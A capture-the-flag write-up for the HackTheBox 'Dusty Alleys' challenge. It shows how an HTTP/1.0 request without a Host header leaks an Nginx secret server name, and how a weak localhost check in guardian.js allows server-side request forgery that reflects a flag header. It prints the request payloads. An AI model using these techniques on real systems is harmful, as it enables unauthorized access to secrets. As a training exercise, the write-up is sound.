HackTheBox - [Dusty Alleys challenge writeup]

Challenge Overview#

We are provided with an Nginx configuration file and a guardian.js source file. The goal is to access the /guardian endpoint, which is protected by a secret server name ($SECRET_ALLEY), and then exploit a logic flaw to retrieve the flag.

Step 1: Leaking the Secret Domain (Nginx Misconfiguration)#

Analysis#

The Nginx config defines two servers:

alley.$SECRET_ALLEY (Default server)
guardian.$SECRET_ALLEY

To access the guardian, we first need to know the random string $SECRET_ALLEY. Looking at the default server config:

1
location /think {
2
    proxy_pass http://localhost:1337;
3
    proxy_set_header Host $host;
4
    ...
5
}

The variable $host in Nginx behaves in a specific way: if the client provides a Host header, it uses that. If the client does not provide a Host header, Nginx defaults to using the server_name from the config. document

Exploit#

Not specifying the Host header in HTTP/1.1 is impossible. So we can downgrade the protocol to HTTP/1.0, which allows non-host header. We can force Nginx to reveal its internal server_name by sending an HTTP/1.0 request to the /think endpoint.

1
GET /think HTTP/1.0
2
No host header here

The backend code for /think returns req.headers. Because we sent no Host header, Nginx filled it with the secret server name.

1
{
2
  "host": "alley.***.htb",
3
  ...
4
}

Step 2: SSRF via The Guardian#

Analysis#

Now that we can address the guardian server. In the source code for /guardian endpoint, it checks if hostname of the input URL is localhost. Then it fetches data from the URL and print out to the browser.

1
router.get("/guardian", async (req, res) => {
2
  const quote = req.query.quote;
3

4
  if (!quote) return res.render("guardian");
5

6
  try {
7
    const location = new URL(quote);
8
    const direction = location.hostname;
9
    if (!direction.endsWith("localhost") && direction !== "localhost")
10
      return res.send("guardian", {
11
        error: "You are forbidden from talking with me.",
12
      });
13
  } catch (error) {
14
    return res.render("guardian", { error: "My brain circuits are mad." });
15
  }
16

17
  try {
18
    let result = await node_fetch(quote, {
19
      method: "GET",
20
      headers: { Key: process.env.FLAG || "HTB{REDACTED}" },
21
    }).then((res) => res.text());
22

23
    res.set("Content-Type", "text/plain");
24

25
    res.send(result);
26
  } catch (e) {
27
    console.error(e);
28
    return res.render("guardian", {
29
      error: "The words are lost in my circuits",
30
    });
31
  }
32
});

The code also attaches the flag to the request as a header. So we can simply craft a quote payload.

1
/guardian?quote=http://localhost:1337/think
2
Host: guardian.***

Then we can achieve the flag.